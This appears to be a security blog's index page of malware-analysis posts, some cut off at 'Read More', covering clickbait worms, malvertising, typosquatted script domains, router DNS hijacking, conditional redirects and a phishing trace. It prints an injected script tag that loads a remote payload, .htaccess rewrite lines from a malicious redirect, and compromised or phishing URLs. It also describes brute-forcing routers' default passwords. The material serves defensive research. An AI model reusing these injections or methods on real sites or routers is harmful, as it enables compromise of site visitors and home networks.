Analyzing a Facebook Clickbait Worm

danger_ahead-1

Here at Sucuri we suspect everything, especially when your friends start to share content written in another language with clickbait headlines. Malicious Facebook posts are one way that hackers can use social engineering to attract and attack victims.

If you are not familiar with the term, clickbait is when web content is created in a way that psychologically exploits the reader’s curiosity using compelling headlines. When someone clicks on the article to read it, the service promoting the article generates online advertisement revenue.

You may know several websites that rely on strategies like this, with BuzzFeed being the typical example. You have already read headlines like: You won’t believe what this guy did after doing that other thing! Or 27 things that people with some personality do! Most of these sites just want your click (and the revenue that they generate), however, some of them turn to the dark side in order to get their message out.
Read More

Websites Compromised with CloudFrond Injection

If you haven’t already noticed, we spent a good deal of time scraping the bottom of the interweb barrel. It’s dirty work, but someone has to do it. I’m not going to lie though, to us it’s fascinating digging up little nuggets daily, understanding how attackers think and uncovering the latest trends. Besides, it gives us countless opportunities to share those with you.

What we find most fascinating are those instance in which we find suspicious payloads where we have to tried to connect the dots. They don’t necessarily do anything malicious at the time we check, but they have, for lack of a better word, great potential. Granted, great potential for the attacker and devastating impacts for the user.

A good example of this is the following payload:

<!-- [if IE]><script type="text/javascript" src="hxxp://cloudfrond.org/golden.phtml"></script> <![endif]-->

Looks good, right? CloudFrond is a valid service, must be a false alarm…


Read More

Malvertising on a Website Without Ads

When you first configure your website, whether it be WordPress, Joomla, Drupal, or any other flavor of the month, it is often in its purest state. Unless ofcourse the server was previously compromised, which in it of itself is another conversation outright. Barring that one instance, the new website should not exhibit any malicious behavior. Or so you would think.

It’s rare though that a default theme will satisfy your every need, it’s often has just enough to wet your beak and get you thinking of ways to extend functionality. So we set off to extend and leverage all the features our favorite CMS offer us.

Watering Down Core Security

The next steps are to add on, to extend. New themes, plugins, sliders, animated gifs, music… no, wait, that’s too 1990’s. Let’s focus on themes, plugins, templates and various other extensions found in today’s modern CMS applications.

Often, the first thing you have in mind when choosing anything for your website is functionality and aesthetics, right? We all want something that looks great and improves user experience. It may be a really cool theme or the newest social network plugin; it’s not a common practice however to inspect its behavior.

What if one of the add-ons you installed is injecting hidden ads on your site? Or what if they are loading pop-up windows like this one?

HD Video Player Advertisement

Malicious Fake Flash Download

This is exactly what a client recently experienced. After installing a clean install of their CMS, configuring and extending it with a new theme, their website started to present it’s users with a Flash installer. For those wondering, this is fairly common, and is something known as a Drive-by-Download. More on that another time though.

Following The Trail

As is natural for us in the research group we can’t help but get lost in cookie trails, every crumbs proves to be more fascinating than that last.

While investigating, it became apparent that the Flash installer was being loaded via an ad, an ad that was being served via an ad network. Immediately I’m thinking malvertising, right?

In this case, the owner hadn’t configured advertising though and yet it was loading content from an ad network.

For your reference, here’s the HTTP Request showing the ad was being loaded by the infected website.

HTTP Headers of the Malvertising Campaign

HTTP Headers of the Malvertising Campaign

While investigating the code I couldn’t find any reference to the adcash.com domain in either the theme or plugin files. Again, the website owner confirmed that he was not using any ad networks. So that left us no choice but to dig a little deeper, we started to investigate the HTTP traffic.

While intercepting the sites Requests and Responses I came across the following entry:

Sucuri - AdCash

Sucuri – AdCash

It’s a request to hxxp:// 37.187.248.215 that returned a 302 Redirect to adcash.com. Yes, success!!! All right! We are one step closer to the source, I was probably looking for the wrong URL in the source code. Duh… Address noted, let’s keep checking the HTTP traffic.

Checking the HTTP responses for that IP address I found this:

URL Variable in HTTP Headers

URL Variable in HTTP Headers

There it is, the hit counter JavaScript code was loading the ad, as you can see the URL in the uri84 variable. It is making a request here: counter6.statcounterfree.com. This request was causing the popup, but was only being triggered once per visitor and the content looks random, suspicious and, more importantly, unwanted.

Adware or Malvertising?

Turns out that the client did in fact add the counter script to their themes footer, so it didn’t come prepackaged. They were trying to keep track of their visitors, they had no intentions of their site being used to serve ads though.

So being that the source of the counter was www.freecounterstat.com I decided to spend some time familiarizing myself with what they do. I spent some time reading through their End User License Agreement (EULA), you never know what goodness you agree too.

Unfortunately, no luck, nothing related to terms or privacy on the website. So I contacted their support to see if this type of behavior was expected.

Based on their response, I’d argue it probably wasn’t:

Hi,

I turn off popup on your account

chris

This is the message I received from support. There are obviously a number of things with that response that worry me, but now the clients website is clean. Whether intentional or not, it’s hard to say, but I’d likely categorize it as a compromised ad network and a malvertising attack.

Personally, I’d stop using this counter script. It’s obviously very 1990 for one, but more importantly if the solution is to disable ads for this site, but not address the bigger issue of drive by downloads being used via the service, that is very concerning. We’ve written about the dangers third-party scripts and service introduce to your environment, this is another example of that.

Conclusion

It is really hard to keep an online service, and even harder if you are doing this for free, so it is understandable that a service uses the adware model to maintain itself. However, it must disclose this to it’s users and offer them an option to opt out. To do it and not offer a user this options is wrong, and as website owners you must be more diligent.

Always check the terms, EULA and privacy policies of third-party software you are using on your website. If they don’t have them, that’s probably a good sign not to use them. Look for any suspicious terms before agreeing to them. If you need help, or you suspect that a plugin or theme is behaving maliciously, let us know.

We love looking through code and potential issues…:) Hit us up at labs@sucuri.net. Happy hunting!!

Typos Can have a Bigger Impact Than Expected

Have you ever thought about the cost of a typo? You know what I mean, a simple misspelling of a word somewhere on your website. Do you think there’s a risk in that?

You may have seen the Grammar Police all over your comments yelling that you used the wrong version of “your” and pointing out how stupid you are, right? Unfortunately, that’s the internet. But what if you have misspelled something that your readers can’t see right away?

Gogle API

What if your typo was in some third-party JavaScript? For example, ajax.gogleapis.com instead of ajax.googleapis.com ? There’s a chance that the domain doesn’t exist and the website just breaks, forcing you to spend some time debugging it to find the wrong include. No big deal. But there is a more dangerous possibility here. The domain could be registered and serving malware to those websites.

Luckily enough the owner of ajax.gogleapis.com, Robin Bradshaw, reached out to us with his findings. He posted on Twitter in response to a recent post of ours about the dangers of hosting third-party scripts. Bradshaw told us that he bought the domain because he was bored and wanted to check if those typos were an issue. He got some interesting data.

It is impressive how many hits it has been receiving since February:

Graphs show 70K views per month

Monthly visits to the misspelled gogleapis.com

Most traffic is coming from Brazilian IP addresses, which is getting there thorough an NGO website. They were contacted to fix this typo, but they never replied. Still waiting for the fix. All the other websites seem to be fixing their code quickly.

Brazil is largest by far, followed by Italy and US

Breakdown of countries using the typos script

Since Bradshaw is such a great guy, not only he did take the typo away from the hands of a person with malicious intentions, but he’s also serving a valid working copy of the ga.js file. Could you imagine how harmful it would be if someone else had gotten a hold of this domain? Someone could easily add to that ga.js file and serve malware or injected malicious SEO.

Typo Squatting

We have looked at one of the possible typos, but what about others?

Of course other people have already thought about using this technique as a way to distribute malware. In this case, the idea is not to register the domain and wait for someone to mistakenly write the URL incorrectly, but rather to deceive the user when they are investigating malicious or suspicious code on their website.

I was able to find a similarly misspelled URL: googleaspis(dot)com. The content is not malicious right now, but it is not serving the right script and it is redirecting the user to a different website.

HTTP headsers of googleaspis.com Redirects to another domain

Googleaspis(dot)com Redirects

A quick check on GitHub revealed one repository with a link to this website. Interestingly, the file name was index_malware.html. The website owner probably wasn’t able to find the malware there and recreated the whole index file, but it’s just speculation.

Github shows typo in index_malware.html

Github shows typo in index_malware.html

There are other typo domains hosted on the same server, like: facebookapis(dot)com, facebboklogin(dot)com, fgoogleapis(dot)com, oogleapis(dot)com and many others.

Conclusion

During my checks I didn’t find any malicious code being hosted by misspelled domains, but that doesn’t mean that there aren’t any. I checked more than 200 variations of Google’s domains used to host scripts for statistics and styles, and all the sites which answered were parked domains. The most suspicious behavior is the one I shared in this post. It does provide for some interesting food for thought though.

Remember to check and double-check all the external content you add to your site. Make sure it’s from a reliable source and that it is typed correctly. The price of a single misspelled character on a domain can be really high.

Malvertising Payload Targets Home Routers

A few weeks ago we wrote about compromised websites being used to attack your web routers at home by changing DNS settings. In that scenario the attackers embedded iFrames to do the heavy lifting, the short fall with this method is they require a website to inject the iFrame. As is often the case, tactics change, and while home routers still seem to be of interest, the latest tactic seems to take the conquer one, conquer all idiom very seriously by targeting ad networks in a concept known as malvertising.

Malvertisements or malvertising are a malicious variety of online advertisements generally used to spread malware. – Kaspersky

This definition is a bit dated, but you get the point. It’s the act of an attacker making use of of what could be a good or bad advertisement on a website, they key these days is the exploitation of what are known as ad servers. Where website integrate a third party ad service to show appropriate ads based on the users visiting and the information the ad network has on the user. It’s a much more complex scenario, but hopefully you get the point.

In this scenario, the attacker is leveraging an ad, part of a large ad network, and embedding their router focused payload within the body of the ad. The ad was being hosted on googlesyndication.com network.

What to Look For

We were notified of suspicious activity by a attentive client that noticed several log in boxes opening while browsing his own website. If you recall, this was the same behavior that led us to the original discovery. He identified malicious ad, hattip for that kind sir, and sent us the link. This naturally gave us what we needed to start analyzing what it was doing.

I was able to capture the URLs it accessed:

Sucuri - Malvertising - URL's

Sucuri – Malvertising – URL’s

The malicious code was heavily encoded and injected in the ad body. This is what the raw payload looked like:

Sucuri - Malvertising - Raw Ad Payload

Sucuri – Malvertising – Raw Ad Payload

After sanitizing the code I was able to catch the decoding function that will translate all the noise.

Sucuri - Malvertising - Breaking Down the Noise

Sucuri – Malvertising – Breaking Down the Noise

Decoding the malicious content, I went through 2,716 blank characters before I found something malicious. It’s hard to tell if this was intentional to evade detection, but the code is there, and it is trying to change your home routers DNS settings and force a reboot.

This time they issue a command to remotely reboot it to make sure the DNS cache is flushed and the malicious site is loaded.

The second improvement is a counter. Unfortunately, during testing http://www.artevegan.com.br/tpl/conteudo/contador/contador.php was disabled.

Screen-Shot-2014-10-16-at-2.12.23-PM

It appears to be configuring a server in LA as an DNS server, which seems to be working fine; during our tests it didn’t return any malicious addresses. All resolved IP addresses were correct, which means it’s probably waiting for the go-live.

The second DNS server set is Google’s, which means they probably had only one compromised server this time. We’ll continue to update as more information becomes available.

Website Malware – Curious .htaccess Conditional Redirect Case

I really enjoy when I see different types of conditional redirects on compromised sites. They are really hard to detect and always lead to interesting investigations. Take a look at this last one we identified:

Website Malware - Curious HTACCESS Payload

The curious aspect about it is the use of a not-so-common .htaccess feature: variables. Most conditional injections rely only on the user agent (browser) or referrer of the visitor, but this one also leveraged the TIME_SEC and VWM variables:

RewriteRule .* - [E=cNL:%{TIME_SEC}]
RewriteRule .* - [E=VWM:oktovia.jonesatlarge.com]


Read More

Conditional Malicious iFrame Targeting WordPress Web Sites

We have an email address, labs@sucuri.net where we receive multiple questions a day about various forms of malware. One of the most common questions happen when our Free Security Scanner, SiteCheck, detects a spam injection or a hidden iframe and the user is unable to locate the infection in the source code. It’s not until we explain what Conditional Malware is that they start to understand it’s implications and more importantly how it works. If you’re unfamiliar, conditional malware is very common these days, as the name implies it’s based on a set number of conditions that determine whether a payload (i.e., the malware) presents itself to the browser. It’s employed because it’s easier to evade scanners and reduces the odds of detection by spreading the impact.


Read More

Website Security – Compromised Website Used To Hack Home Routers

What if we told you that a compromised website has the ability to hack your home router?

Yesterday we were notified that a popular newspaper in Brazil (politica.estadao.com.br) was hacked and loading several iframes. These iframes were trying to change the DNS configuration on the victim’s DSL router by Brute Forcing the admin credentials.

Sucuri - Politica NewsPaper Twitter Notification

Sucuri – Politica NewsPaper Twitter Notification

As you can see in the image, the payload was trying the user admin, root, gvt and a few other usernames, all using the router default passwords. Hours after being notified, the website was still compromised so we decided to dig a little deeper.

Below is the payload chain:


Read More

Microsoft IIS Web Server – CMD Process Contributing to Website Reinfections

We often spend a lot of time talking about application level malware, but from time to time we do like to dabble in the ever so interesting web server infections as well. It is one of those things that comes with the job. Today, we’re going to chat about an interesting reinfection case in which the client was running their website on a Microsoft’s Internet Information Services (IIS) web server. Yes, contrary to popular belief many organizations, especially large enterprise organizations, still leverage and operate IIS web servers.

And for those that thought we only dabble in Linux Apache MySql PHP (LAMP) stacks, well now you know.. :)

As is often the case, when we think of the how and the what attackers are set out to do once they penetrate our web server we stop short of the final step – maintaining control of the environment. This is perhaps the most critical, especially today where ownership of a slave box can fetch a great sum of money in the underground.


Read More

Phishing Tale: An Analysis of an Email Phishing Scam

Phishing scams are always bad news, and in light of the Google Drive scam that made the rounds again last week, we thought we’d tell the story of some spam that was delivered into my own inbox because even security researchers, with well though-out email block rules, still get SPAM in our inboxes from time to time.

Here’s where the story begins:

Today, among all the spam that I get in my inbox, one phishing email somehow made its way through all of my block rules.

Spam email in our security team's inbox

Even our security team gets SPAM from time to time.

I decided to look into it a little further. Of course, I wanted to know whether or not we were already blocking the phishing page, but I also wanted to investigate further and see if I could figure out where it came from. Was it from a compromised site or a trojanized computer?

The investigation started with the mail headers (identifying addresses have been changed, mostly to protect my email ☺):

Blog1

The headers tell us that miami.hostmeta.com.br is being used to send the spam. It’s also an alert that some of the sites in this shared server are likely vulnerable to the form: X-Mailer: PHPMailer [version 1.73]. I decided to look into the server and found that it contained quite a few problems. This server hosts about twenty sites, some of which are outdated–WordPress 2.9.2 is the oldest–while others are disclosing outdated web server versions (Outdated Web Server Apache Found: Apache/2.2.22) and still others are blacklisted (http://www.siteadvisor.com/sites/presten.com.br). This makes it pretty difficult to tell where the spam came from, right?

Luckily, there’s another header to help us, Message-ID:. nucleodenegociosweb.com.br is hosted on miami.hostmeta.com.br and it has an open contact form. I used it to send a test message and although the headers are similar, the PHPMailer differs:

Blog2

What Do We Know Now?

We know who is sending the phishing messages, but what host are they coming from? There are some clues in the message body:

blog3

From that image, we can see that http://www.dbdacademy.com/dbdtube/includes/domit/new/ is hosting the image and the link to the phishing scam, but it doesn’t end there. As you can see from the content below, we’ll be served a redirect to http://masd-10.com/contenido/modules/mod_feed/tmpl/old/?cli=Cliente&/JMKdWbAqLH/CTzPjXNZ7h.php, which loads an iframe hosted on http://www.gmff.com.hk/data1/tooltips/new/.

Here is the content:
Phishing email

Problem Solved – Or is It?

In this case, there are three compromised sites being used to deliver the phishing campaign and it’s becoming very common to see this strategy being adopted. The problem from the bad guy’s point of view, is that if they store all of their campaign components on one site, then they lose all of their work when we come in and clean the website. If they split the components up and place them on multiple sites, with different site owners, then it’s unlikely that all of the sites will be cleaned at one time, which means their scam can continue.

As always with malware, it’s not enough for your site to be clean. You also need to rely on everyone else to keep their own site clean. When others don’t, your computer or website can be put at risk.

If you’re interested in technical notes regarding the type of research we do be sure to follow us on Twitter and be sure to check in with our Lab Notes. If you something interesting you’d like us analyze please don’t hesitate to ping us, we’re always looking for a new challenge.